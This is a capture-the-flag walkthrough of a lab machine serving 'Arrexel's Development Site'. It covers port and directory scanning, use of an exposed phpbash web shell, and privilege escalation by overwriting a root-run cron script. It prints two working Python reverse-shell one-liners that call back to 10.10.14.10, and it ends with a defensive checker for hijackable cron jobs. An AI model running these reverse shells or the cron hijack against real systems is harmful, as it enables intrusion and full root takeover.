Basic information

Port scan

Only port 80 is open:

$ nmap -sC -sV 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-11 15:00 CST
Nmap scan report for 10.10.10.68
Host is up (0.070s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.43 seconds

80

phpbash:

Directory scan

The directory scan turns up a dev directory, and inside it there is a phpbash.php:

gobuster dir -u http://10.10.10.68/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -t 50

/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/css (Status: 301)
/dev (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/php (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)

phpbash

This is a ready-made web shell sitting on the server:

reverse shell

From phpbash the usual nc reverse shell does not come back; a Python reverse shell works instead:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.10",4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

user flag

We are currently www-data, but that user already has permission to read user.txt in arrexel's home directory:

Privilege escalation information

scriptmanager

www-data can run arbitrary commands as scriptmanager through sudo, so switch to scriptmanager first (the second line upgrades the shell to a proper pty):

sudo -u scriptmanager /bin/bash
python -c 'import pty; pty.spawn("/bin/bash")'

scripts

There is a scripts directory under /, and the files in it are a clear hint: the .py is owned by scriptmanager while the .txt is owned by root, so root must be running test.py on a schedule (a cron job) and writing its output to the .txt:

Privilege escalation & root flag:

Since scriptmanager owns test.py, simply overwrite it with a reverse shell, wait for the cron job to fire, and read root.txt from the root shell that comes back:

echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.10\",4446));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);" > test.py
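The escalation above rests on one pattern: a job that runs as root executes a script that a less-privileged user can edit. The following is an added example, not code from the original writeup, that parses system-crontab lines (/etc/crontab and /etc/cron.d style, with a user field) and flags root jobs whose script is owned by someone other than root. The crontab lines and the ownership table in it are constructed for the example; the real crontab on the box is not shown in the writeup, and the path /scripts/test.py is taken from the text.

```python
"""Added example (not from the original writeup): find cron jobs that run as
root but execute a script owned by another user, the pattern behind the
/scripts/test.py privilege escalation.
"""
import os
import pwd
import shlex

# Constructed sample crontab; NOT the real crontab from the box.
SAMPLE_CRONTAB = """\
# constructed /etc/crontab-style content for this example
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* *     * * *   root    python /scripts/test.py > /scripts/test.txt
*/5 *   * * *   scriptmanager  python /scripts/other.py
"""

# Constructed ownership table standing in for os.stat() on the real box.
SAMPLE_OWNERS = {
    "/scripts/test.py": "scriptmanager",
    "/scripts/other.py": "scriptmanager",
}


def parse_system_crontab(text):
    """Return (user, command) pairs from system-crontab text.

    System crontabs carry five time fields, a user field, then the command.
    Blank lines, comments and VAR=value assignments are skipped; @reboot-style
    lines use a single schedule keyword instead of five fields.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def script_paths(command):
    """Absolute script paths referenced by a cron command line.

    Only absolute paths with a script-like extension are returned; relative
    paths after a `cd` are not resolved, so they are a false negative here.
    """
    return [
        tok
        for tok in shlex.split(command, posix=True)
        if tok.startswith("/") and tok.endswith((".py", ".sh", ".pl"))
    ]


def find_hijackable(jobs, owner_of):
    """Return (user, path, owner) for root jobs whose script is not root-owned.

    owner_of(path) -> username or None; pass real_owner on a live system or a
    dict's .get for constructed data.
    """
    findings = []
    for user, command in jobs:
        if user != "root":
            continue
        for path in script_paths(command):
            owner = owner_of(path)
            if owner is not None and owner != "root":
                findings.append((user, path, owner))
    return findings


def real_owner(path):
    """Owner username of a file on the local filesystem, or None if absent."""
    try:
        return pwd.getpwuid(os.stat(path).st_uid).pw_name
    except (FileNotFoundError, KeyError):
        return None


def demo():
    """Run the check over the constructed sample data."""
    return find_hijackable(parse_system_crontab(SAMPLE_CRONTAB), SAMPLE_OWNERS.get)


if __name__ == "__main__":
    for user, path, owner in demo():
        print(f"{user} runs {path}, which is owned by {owner}: hijackable")
```

On a real host, feed it `open("/etc/crontab").read()` plus the files under /etc/cron.d and pass `real_owner`; ownership alone is the signal the writeup used, but a script that is group- or world-writable is just as hijackable, so a fuller check would also look at the mode bits.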

References